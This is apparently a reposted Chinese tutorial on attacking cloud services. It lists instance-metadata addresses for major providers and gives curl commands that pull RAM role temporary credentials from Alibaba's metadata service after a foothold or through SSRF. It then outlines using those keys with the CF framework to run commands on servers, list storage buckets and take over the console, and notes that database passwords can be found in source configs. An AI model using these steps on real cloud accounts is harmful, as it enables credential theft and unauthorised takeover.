云上攻防-云服务&弹性计算服务器&云数据库&实例元数据&控制角色&AK控制台接
知识点:1、云服务-弹性计算服务器-元数据&SSRF&AK
2、云服务-云数据库-外部连接&权限提升
章节点:
云场景攻防:公有云,私有云,混淆云,虚拟化集群,云桌面等
云厂商攻防:阿里云,腾讯云,华为云,亚马云,谷歌云,微软云等
云服务攻防:对象存储,云数据库,弹性计算服务器(云服务器),VPC&RAM等
云原生攻防:Docker,Kubernetes(k8s),容器逃逸,CI/CD等
一、演示案例-云服务-弹性计算服务器-元数据&SSRF&AK
元数据表明
实例元数据(metadata)包罗了弹性计算云服务器实例在阿里云体系中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(根本信息:实例ID、IP地址、网卡MAC地址、操纵体系类型等信息。实例标识包罗实例标识文档和实例标识签名,所有信息均实时天生,常用于快速辨别实例身份。)
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230164956226-1645510562.png
各大云元数据地址:
阿里云元数据地址:http://100.100.100.200/
腾讯云元数据地址:http://metadata.tencentyun.com/
华为云元数据地址:http://169.254.169.254/
亚马云元数据地址:http://169.254.169.254/
微软云元数据地址:http://169.254.169.254/
谷歌云元数据地址:http://metadata.google.internal/
细节方面可通过访问官网找元数据访问触发阐明
阿里云例子:https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165119883-881575907.png
腾讯云例子:https://cloud.tencent.com/document/product/213/4934
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165201267-1057294471.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165211961-148777836.png
1、条件条件:
弹性计算服务器配置访问控制角色
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165305858-678496.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165309142-182369348.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165312176-17533738.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165313605-1574543512.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165316508-638465623.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165320810-878018135.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165323353-237637672.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165324876-922464126.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165325869-150815609.png
SSRF漏洞或已取得某云服务器权限(webshell或漏洞rce可以访问触发url)
2、使用环境1:获取某服务器权限后横向移动
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165358237-578777749.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165400172-417587212.png
获取关键角色信息
curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165441720-2080780793.png
获取ecs角色临时凭证
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165507925-1652643471.png
使用AK横向移动
CF 云渗出框架项目:https://wiki.teamssix.com/CF/
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165532138-1895442417.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165540075-710809582.png
1、先配置云服务商的访问密钥
cf config
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165631228-701336735.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165633305-1465665819.png
2、获取控制台
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165652465-720711239.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165654632-571843877.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165656926-1518770260.png
3、获取所有的ecs服务器https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165707332-114086977.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165708795-311250326.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165710475-1655947089.png
4、实行命令(需要先获取ecs服务器)
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165720925-24413941.png
5、获取所有oss存储桶
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165750072-960227774.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165758845-478718022.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165804642-690455568.png
能看这么多东西是授权的权限高,假如权限低的话能看的东西就很少。
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165819742-402343584.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165834662-1730895912.png
3、使用环境2:某服务器上Web资产存在SSRF漏洞
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165847300-1011207895.png
获取关键角色信息
curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/
获取ecs临时凭证
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165934653-170459158.png
使用AK横向移动
CF 云渗出框架项目:https://wiki.teamssix.com/CF/
二、演示案例-云服务-云数据库-外部连接&权限提升
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170014087-1989577321.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170015860-561624106.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170017076-2014367174.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170018811-1523269452.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170020215-1503395585.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170021575-948255976.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170023065-1310938109.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170024718-1155862960.png
1、帐号密码
源码配置中找到(几率高)或爆破手段(几率低)
2、连接获取
白名单&外网 直接Navicat支持连接
内网需要其中内网某一个服务器做转发
3、AK使用(权限提升)
CF 云渗出框架项目:https://wiki.teamssix.com/CF/
三、演示案例-云上攻防-如何使用SSRF直接打穿云上内网
1. 使用SSRF发现打点阿里云
这里的 SSRF 漏洞触发点在 UEditor 编辑器的上传图片功能中,下面我们尝试让服务器从 https://baidu.com?.jpg 获取图片。
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170103070-1988197090.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170105085-538935536.png
2. 直接使用SSRF漏洞获取目的阿里云的元数据地址
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084020789-950901895.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084021731-742504820.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084023800-595663369.png
3.直接上CF使用框架项目,冲起来https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084035612-1244408013.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084036793-321314590.png
4.存储桶下载后内里翻出另一个AK信息,发现这个 AK 还具有 ECS 的权限。
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084053810-919513317.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084054970-560774977.png
5.直接使用 CF拿下一键接管控制台
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084123927-841633862.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084126127-1914055794.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084128522-1567954546.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]